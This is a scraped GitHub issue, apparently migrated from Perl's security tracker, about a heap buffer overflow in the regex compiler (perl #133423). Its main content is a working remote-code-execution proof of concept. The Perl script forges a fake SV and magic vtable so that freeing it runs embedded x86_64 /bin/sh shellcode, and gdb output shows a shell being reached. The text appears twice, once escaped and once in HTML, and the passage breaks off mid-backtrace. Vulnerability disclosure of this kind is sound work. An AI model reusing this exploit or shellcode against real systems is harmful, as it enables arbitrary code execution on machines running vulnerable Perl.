MGVTBL\\* const vtbl = mg\\-\u003emg\\_virtual;\n\\(gdb\\) bt\n\\#0 S\\_mg\\_free\\_struct \\(sv=sv@\u0026#8203;entry=0xa34ca5\\, mg=0xa34ce8\\) at mg\\.c\u0026#8203;:556\n\\#1 0x00000000004f1153 in Perl\\_mg\\_free \\(sv=sv@\u0026#8203;entry=0xa34ca5\\) at mg\\.c\u0026#8203;:588\n\\#2 0x0000000000527d9e in Perl\\_sv\\_clear \\(orig\\_sv=orig\\_sv@\u0026#8203;entry=0xa34ca5\\) at\nsv\\.c\u0026#8203;:6539\n\\#3 0x0000000000528784 in Perl\\_sv\\_free2 \\(sv=0xa34ca5\\, rc=\\\u003coptimized out\u003e\\)\nat sv\\.c\u0026#8203;:7038\n\\#4 0x00000000005273ec in S\\_SvREFCNT\\_dec \\(sv=\\\u003coptimized out\u003e\\) at\ninline\\.h\u0026#8203;:216\n\\#5 S\\_curse \\(sv=sv@\u0026#8203;entry=0xa34c7d\\, check\\_refcnt=check\\_refcnt@\u0026#8203;entry=true\\) at\nsv\\.c\u0026#8203;:6970\n\\#6 0x000000000052783a in Perl\\_sv\\_clear \\(orig\\_sv=orig\\_sv@\u0026#8203;entry=0xa34c7d\\) at\nsv\\.c\u0026#8203;:6531\n\\#7 0x0000000000528784 in Perl\\_sv\\_free2 \\(sv=sv@\u0026#8203;entry=0xa34c7d\\,\nrc=\\\u003coptimized out\u003e\\) at sv\\.c\u0026#8203;:7038\n\\#8 0x0000000000528c48 in S\\_SvREFCNT\\_dec\\_NN \\(sv=0xa34c7d\\) at inline\\.h\u0026#8203;:227\n\\#9 do\\_clean\\_named\\_objs \\(sv=sv@\u0026#8203;entry=0xa2e958\\) at sv\\.c\u0026#8203;:560\n\\#10 0x0000000000524a07 in S\\_visit \\(f=0x5288b0 \\\u003cdo\\_clean\\_named\\_objs\u003e\\,\nflags=32777\\, mask=49407\\) at sv\\.c\u0026#8203;:476\n\\#11 0x00000000005292b0 in Perl\\_sv\\_clean\\_objs \\(\\) at sv\\.c\u0026#8203;:631\n\\#12 0x000000000044ef00 in perl\\_destruct \\(my\\_perl=\\\u003coptimized out\u003e\\) at\nperl\\.c\u0026#8203;:908\n\\#13 0x000000000041fb74 in main \\(argc=\\\u003coptimized out\u003e\\, argv=\\\u003coptimized out\u003e\\,\nenv=\\\u003coptimized out\u003e\\) at perlmain\\.c\u0026#8203;:133\n\\(gdb\\) c\nContinuing\\.\nprocess 13359 is executing new program\u0026#8203;: /usr/bin/bash\nError in re\\-setting breakpoint 2\u0026#8203;: Function \"S\\_mg\\_free\\_struct\" not defined\\.\nsh\\-4\\.4$ date\nDetaching after fork from child process 13509\\.\nMon Aug 27 22\u0026#8203;:04\u0026#8203;:46 JST 2018\n\\`\\`\\`\n\n2018\\-08\\-16 12\u0026#8203;:52 GMT\\+09\u0026#8203;:00 Karl Williamson via RT \\\u003c\nperl5\\-security\\-report\\-followup@\u0026#8203;perl\\.org\u003e\u0026#8203;:\n\n\u003e Resending this as it did not make it to the list\u0026#8203;:\n\u003e\n\u003e On Wed\\, 15 Aug 2018 11\u0026#8203;:01\u0026#8203;:24 \\-0700\\, khw wrote\u0026#8203;:\n\u003e \u003e I suspect this is a serious security issue\\. One can position where\n\u003e \u003e beyond the end of buffer gets written by adding \\\\x80's to the ones\n\u003e \u003e already there\\. But I'd be happy to be wrong about this\\.\n\u003e \u003e\n\u003e \u003e The cause is one branch during the parsing leaves the parse pointer\n\u003e \u003e positioned one too far\\, and that causes the backslash to be skipped\n\u003e \u003e during pass2\\, which causes a '\\]' to be treated as a metacharacter\n\u003e \u003e instead of a literal\\.\n\u003e \u003e\n\u003e \u003e The fix is to remove the single line that incorrectly increments the\n\u003e \u003e parse pointer\\.\n\u003e \u003e I don't know that this being an experimental feature has any bearing\n\u003e \u003e on it\\.\n\u003e \u003e\n\u003e \u003e There is another thing\\. The minus sign in this case could have been\n\u003e \u003e caught as incorrect\\. But the same out\\-of\\-bounds writes would occur if\n\u003e \u003e a '^' replaced the minus\\, and that would be a correct use\\.\n\u003e \u003e\n\u003e \u003e Karl Williamson\n\u003e\n\u003e","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/Etsukata/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/Etsukata\"\u003e@Etsukata\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eThe following code generates a regexp which executes arbitrary command\u003cbr\u003e\nduring global destruction.\u003cbr\u003e\nIt overwrites some SV pointer address to a crafted fake SV on overwritten\u003cbr\u003e\nheap which has the malicious svt_free(shell_code) on its magic vtable.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eLimitations:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e - must set `execstack -s` to perl\u003cbr\u003e\n - require address leak(exact address of overwritten heap)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n#!/usr/bin/perl\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e#\u003cbr\u003e\n# RCE exploit PoC for\u003cbr\u003e\n# [perl #133423] regcomp: heap-buffer-overflow write\u003cbr\u003e\n# on perl-blead-48ae8dc\u003cbr\u003e\n#\u003c/p\u003e\n\u003cp dir=\"auto\"\u003euse strict;\u003cbr\u003e\nuse warnings;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# 0xabcd =\u0026gt; '\\xcd\\xab\\x00\\x00\\x00\\x00\\x00\\x00'\u003cbr\u003e\nsub h2s {\u003cbr\u003e\n my $h = shift;\u003cbr\u003e\n my $sz = shift;\u003cbr\u003e\n my $ret = '';\u003cbr\u003e\n for (0..($sz - 1)) {\u003cbr\u003e\n $ret .= sprintf(\"\\\\x%02x\", (($h \u0026gt;\u0026gt; (8 * $_)) \u0026amp; 0xff));\u003cbr\u003e\n }\u003cbr\u003e\n return $ret\u003cbr\u003e\n}\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# must set `execstack -s` to perl\u003cbr\u003e\nmy $cmd = 'gdb -q --args ~/perl5/perlbrew/perls/perl-blead-debug/bin/perl\u003cbr\u003e\n-DorD -le ';\u003cbr\u003e\nmy $prefix = '\\'my $r = \"(?[(?x:(?[\\\\\\\\a]))\\\\\\\\]a\\x00';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $address = 0xa34c7d; # overwrite start address\u003cbr\u003e\n # search with:\u003cbr\u003e\n # (gdb) b regcomp.c:14044\u003cbr\u003e\n # (gdb) p s\u003cbr\u003e\n # [CAUTION] must not contain ']' (0x5d)\u003cbr\u003e\n #\u003cbr\u003e\nmy $sv_any_address = $address + 8 + 4 + 4 + 8;\u003cbr\u003e\nmy $stash_address = $sv_any_address + 8 + 8;\u003cbr\u003e\nmy $stash_address2 = $stash_address + 8 + 4 + 4;\u003cbr\u003e\nmy $magic_address = $stash_address + 8 + 4 + 4 + 8 + 8 + 8 + 19 + 8;\u003cbr\u003e\nmy $mg_virtual_address = $magic_address + 8 + 8 + 2 + 1 + 1 + 8 + 8 + 8;\u003cbr\u003e\nmy $shell_code_address = $mg_virtual_address + 8 + 8 + 8 + 8 + 8;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $body =\u003cbr\u003e\n# sv($address)\u003cbr\u003e\n h2s($sv_any_address, 8)\u003cbr\u003e\n. h2s(0x01, 4) # sv_refcnt\u003cbr\u003e\n. h2s(0x100007, 4) # sv_flags (SVt_PVMG || SVs_OBJECT)\u003cbr\u003e\n. h2s(0x00, 8) # sv-\u0026gt;sv_u.svu_pv\u003cbr\u003e\n# any($sv_any_address)\u003cbr\u003e\n. h2s($stash_address, 8) # HV* xmg_stash\u003cbr\u003e\n. h2s($magic_address, 8) # union _xmgu xmg_u (MAGIC* xmg_magic)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# xmg_stash($stash_address)\u003cbr\u003e\n. h2s($stash_address2, 8) # sv_any\u003cbr\u003e\n. h2s(0x01, 4) # sv_refcnt\u003cbr\u003e\n. h2s(0x0c, 4) # sv_flags (SVt_PVHV)\u003cbr\u003e\n# any($stash_address2)\u003cbr\u003e\n. h2s(0x00, 8) # HV* xmg_stash\u003cbr\u003e\n. h2s($magic_address, 8) # union _xmgu xmg_u (MAGIC* xmg_magic)\u003cbr\u003e\n. h2s(0x00, 8) # padding\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e. '\" . \"a\" x 19 . \"' # padding\u003cbr\u003e\n. h2s($address, 8) # OVERWRITE gvp\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# xmg_magic($magic_address)\u003cbr\u003e\n. h2s(0x00, 8) # MAGIC* mg_moremagic;\u003cbr\u003e\n. h2s($mg_virtual_address, 8) # MGVTBL* mg_virtual /* pointer to magic\u003cbr\u003e\nfunctions */\u003cbr\u003e\n. h2s(0x00, 2) # U16 mg_private;\u003cbr\u003e\n. h2s(0x00, 1) # char mg_type;\u003cbr\u003e\n. h2s(0x00, 1) # U8 mg_flags;\u003cbr\u003e\n. h2s(0x00, 8) # SSize_t mg_len;\u003cbr\u003e\n. h2s(0x00, 8) # SV* mg_obj;\u003cbr\u003e\n. h2s(0x00, 8) # char* mg_ptr;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# mg_virual($mg_virtual_address)\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_get) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_set) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # U32 (*svt_len) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_clear)(pTHX_ SV *sv, MAGIC* mg);\u003cbr\u003e\n. h2s($shell_code_address, 8) # int (*svt_free) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# x86_64 shell_code\u003cbr\u003e\n.\u003cbr\u003e\n'\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05'\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e. '])a\\\\\\\\6\"; qr/$r/\\'';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $payload = $prefix . $body;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eprint $cmd . $payload . \"\\n\";\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSample output\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n[eiichi@x1 exploit]$ perl perl_regexp_mg_free.pl\u003cbr\u003e\ngdb -q --args ~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le\u003cbr\u003e\n'my $r =\u003cbr\u003e\n\"(?[(?x:(?[\\\\a]))\\\\]a\\x00\\x95\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xb5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\u003cbr\u003e\n. \"a\" x 19 .\u003cbr\u003e\n\"\\x7d\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3c\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05])a\\\\6\";\u003cbr\u003e\nqr/$r/'\u003cbr\u003e\n[eiichi@x1 exploit]$ gdb -q --args\u003cbr\u003e\n~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le 'my $r =\u003cbr\u003e\n\"(?[(?x:(?[\\\\a]))\\\\]a\\x00\\x95\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xb5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\u003cbr\u003e\n. \"a\" x 19 .\u003cbr\u003e\n\"\\x7d\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3c\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05])a\\\\6\";\u003cbr\u003e\nqr/$r/'\u003cbr\u003e\nReading symbols from\u003cbr\u003e\n/home/eiichi/perl5/perlbrew/perls/perl-blead-debug/bin/perl...done.\u003cbr\u003e\n(gdb) b regcomp.c:14044\u003cbr\u003e\nBreakpoint 1 at 0x4cb38d: file regcomp.c, line 14044.\u003cbr\u003e\n(gdb) run\u003cbr\u003e\nStarting program:\u003cbr\u003e\n/home/eiichi/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le my\\\u003cbr\u003e\n\\$r\\ =\\\u003cbr\u003e\n\\\"\\(\\?\\[\\(\\?x:\\(\\?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\"\\\u003cbr\u003e\n.\\ \\\"a\\\"\\ x\\ 19\\ .\\\u003cbr\u003e\n\\\"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\\\"\\;\\\u003cbr\u003e\nqr/\\$r/\u003cbr\u003e\n[Thread debugging using libthread_db enabled]\u003cbr\u003e\nUsing host libthread_db library \"/lib64/libthread_db.so.1\".\u003cbr\u003e\nwarning: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nwarning: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nwarning: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\n(-e:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e:2) Looking for DESTROY method for IO::File\u003cbr\u003e\n(-e:2) Looking for method DESTROY in package IO::File\u003cbr\u003e\n(-e:2) Looking for method DESTROY in package UNIVERSAL\u003cbr\u003e\n(-e:2) Looking for method AUTOLOAD in package IO::File\u003cbr\u003e\n(-e:2) Looking for method AUTOLOAD in package UNIVERSAL\u003cbr\u003e\n(-e:2) Set cached DESTROY method 0 for IO::File\u003cbr\u003e\nEnabling \u003cmath-renderer class=\"js-inline-math\" style=\"display: inline-block\" data-static-url=\"https://github.githubassets.com/static\" data-run-id=\"fe472446ab8b6d2948dbfca26e766d8d\"\u003e$` $\u003c/math-renderer\u003e\u0026amp;amp; $' support (0x7).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eEXECUTING...\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCompiling REx\u003cbr\u003e\n\"(?[(?x:(?[\\a]))\\]a%0%x{95}L%x{a3}%0%0%0%0%0%1%0%0%0%7%0%20%0\"...\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[ \u0026lt;-- HERE (?x:(?[\\a]))\\]a?L??L???L?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e?aaaaaaaaaaaaaaaaaaa}L?M?\u0026lt;M?H1H?/bin//shPH?WH??B;])a\\6/ at -e line 1.\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[(?x:(?[ \u0026lt;-- HERE \\a]))\\]a?L??L???L?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e?aaaaaaaaaaaaaaaaaaa}L?M?\u0026lt;M?H1H?/bin//shPH?WH??B;])a\\6/ at -e line 1.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBreakpoint 1, S_regatom (pRExC_state=pRExC_state@entry=0x7fffffffcd40,\u003cbr\u003e\nflagp=flagp@entry=0x7fffffffca24,\u003cbr\u003e\n depth=depth@entry=4) at regcomp.c:14044\u003cbr\u003e\n14044 *(s)++ = (U8) ender;\u003cbr\u003e\nMissing separate debuginfos, use: dnf debuginfo-install\u003cbr\u003e\nkeyutils-libs-1.5.10-6.fc28.x86_64 krb5-libs-1.16.1-13.fc28.x86_64\u003cbr\u003e\nlibcom_err-1.44.2-0.fc28.x86_64\u003cbr\u003e\nlibnsl2-1.2.0-2.20180605git4a062cf.fc28.x86_64 libselinux-2.8-1.fc28.x86_64\u003cbr\u003e\nlibtirpc-1.0.3-3.rc2.fc28.x86_64 libxcrypt-4.1.1-4.fc28.x86_64\u003cbr\u003e\nopenssl-libs-1.1.0h-3.fc28.x86_64 pcre2-10.31-8.fc28.x86_64\u003cbr\u003e\nzlib-1.2.11-8.fc28.x86_64\u003cbr\u003e\n(gdb) p s\u003cbr\u003e\n$1 = 0xa34c7d \"\"\u003cbr\u003e\n(gdb) b S_mg_free_struct\u003cbr\u003e\nBreakpoint 2 at 0x4f0620: file mg.c, line 556.\u003cbr\u003e\n(gdb) dis br 1\u003cbr\u003e\n(gdb) c\u003cbr\u003e\nContinuing.\u003cbr\u003e\npanic: reg_node overrun trying to emit 0, a34d5c\u0026gt;=a34c8c at -e line 1.\u003cbr\u003e\nCleaning named glob SV object:\u003cbr\u003e\nSV = PVMG(0xa34c95) at 0xa34c7d\u003cbr\u003e\n REFCNT = 1\u003cbr\u003e\n FLAGS = (OBJECT)\u003cbr\u003e\n IV = 0\u003cbr\u003e\n NV = 5.28751820946919e-317\u003cbr\u003e\n PV = 0\u003cbr\u003e\n MAGIC = 0xa34ce8\u003cbr\u003e\n MG_VIRTUAL = 0xa34d14\u003cbr\u003e\n MG_TYPE = PERL_MAGIC_sv(\\0)\u003cbr\u003e\n STASH = 0xa34ca5\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBreakpoint 2, S_mg_free_struct (sv=sv@entry=0xa34ca5, mg=0xa34ce8) at\u003cbr\u003e\nmg.c:556\u003cbr\u003e\n556 const MGVTBL* const vtbl = mg-\u0026gt;mg_virtual;\u003cbr\u003e\n(gdb) bt\u003cbr\u003e\n#0 S_mg_free_struct (sv=sv@entry=0xa34ca5, mg=0xa34ce8) at mg.c:556\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"24492722\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/1\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/1/hovercard\" href=\"https://github.com/Perl/perl5/pull/1\"\u003e#1\u003c/a\u003e 0x00000000004f1153 in Perl_mg_free (sv=sv@entry=0xa34ca5) at mg.c:588\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"32825340\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/2\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/2/hovercard\" href=\"https://github.com/Perl/perl5/pull/2\"\u003e#2\u003c/a\u003e 0x0000000000527d9e in Perl_sv_clear (orig_sv=orig_sv@entry=0xa34ca5) at\u003cbr\u003e\nsv.c:6539\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"35342020\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/3\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/3/hovercard\" href=\"https://github.com/Perl/perl5/pull/3\"\u003e#3\u003c/a\u003e 0x0000000000528784 in Perl_sv_free2 (sv=0xa34ca5, rc=\u0026lt;optimized out\u0026gt;)\u003cbr\u003e\nat sv.c:7038\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"38664231\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/4\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/4/hovercard\" href=\"https://github.com/Perl/perl5/pull/4\"\u003e#4\u003c/a\u003e 0x00000000005273ec in S_SvREFCNT_dec (sv=\u0026lt;optimized out\u0026gt;) at\u003cbr\u003e\ninline.h:216\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"39416547\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/5\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/5/hovercard\" href=\"https://github.com/Perl/perl5/pull/5\"\u003e#5\u003c/a\u003e S_curse (sv=sv@entry=0xa34c7d, check_refcnt=check_refcnt@entry=true) at\u003cbr\u003e\nsv.c:6970\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"53427695\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/6\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/6/hovercard\" href=\"https://github.com/Perl/perl5/pull/6\"\u003e#6\u003c/a\u003e 0x000000000052783a in Perl_sv_clear (orig_sv=orig_sv@entry=0xa34c7d) at\u003cbr\u003e\nsv.c:6531\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"90982472\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/7\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/7/hovercard\" href=\"https://github.com/Perl/perl5/pull/7\"\u003e#7\u003c/a\u003e 0x0000000000528784 in Perl_sv_free2 (sv=sv@entry=0xa34c7d,\u003cbr\u003e\nrc=\u0026lt;optimized out\u0026gt;) at sv.c:7038\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"98283145\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/8\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/8/hovercard\" href=\"https://github.com/Perl/perl5/pull/8\"\u003e#8\u003c/a\u003e 0x0000000000528c48 in S_SvREFCNT_dec_NN (sv=0xa34c7d) at inline.h:227\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"98288284\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/9\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/9/hovercard\" href=\"https://github.com/Perl/perl5/pull/9\"\u003e#9\u003c/a\u003e do_clean_named_objs (sv=sv@entry=0xa2e958) at sv.c:560\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"170856524\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/10\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/10/hovercard\" href=\"https://github.com/Perl/perl5/pull/10\"\u003e#10\u003c/a\u003e 0x0000000000524a07 in S_visit (f=0x5288b0 \u0026lt;do_clean_named_objs\u0026gt;,\u003cbr\u003e\nflags=32777, mask=49407) at sv.c:476\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"214252446\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/11\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/11/hovercard\" href=\"https://github.com/Perl/perl5/pull/11\"\u003e#11\u003c/a\u003e 0x00000000005292b0 in Perl_sv_clean_objs () at sv.c:631\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"275535515\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/12\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/12/hovercard\" href=\"https://github.com/Perl/perl5/pull/12\"\u003e#12\u003c/a\u003e 0x000000000044ef00 in perl_destruct (my_perl=\u0026lt;optimized out\u0026gt;) at\u003cbr\u003e\nperl.c:908\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"329536409\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/13\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/13/hovercard\" href=\"https://github.com/Perl/perl5/pull/13\"\u003e#13\u003c/a\u003e 0x000000000041fb74 in main (argc=\u0026lt;optimized out\u0026gt;, argv=\u0026lt;optimized 